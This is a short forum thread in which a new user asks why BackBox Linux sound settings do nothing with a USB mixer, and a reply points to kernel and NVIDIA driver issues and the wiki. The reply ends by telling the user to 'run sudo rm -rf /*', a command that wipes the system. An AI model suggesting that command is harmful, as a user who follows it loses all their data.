Hi everybody

Im quite new to linux (pentest as well) but i decided to use blackbox at home, (and work with kali)
But...i just cant change sound settings. and this is really bugs me, coz i have turntables as well, and i can(could) connect the laptop also to the mixer.

i can see the mixer in the output of the lsusb and actually the mixer works with kali/mint just as plug n play. if i click on sound settings in blackbox, just nothing happens (even if i login as root)

i know it is not for multimedia and siht and gui is from devil, but this should work, right? please help me with any suggestion.

thanks.

Hi,

First of all it's kind disappointing to see user who don't know name of system he is using, it's not blackbox it's backbox, but anyway .... We wrote about "sound" issues on this forum, and you can find some solutions. As issue is connected to kernel and NVIDIA drivers, best to do is try higher kernel version and last NVIDIA drivers, if you are using some. Full solution is not provided for now.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*
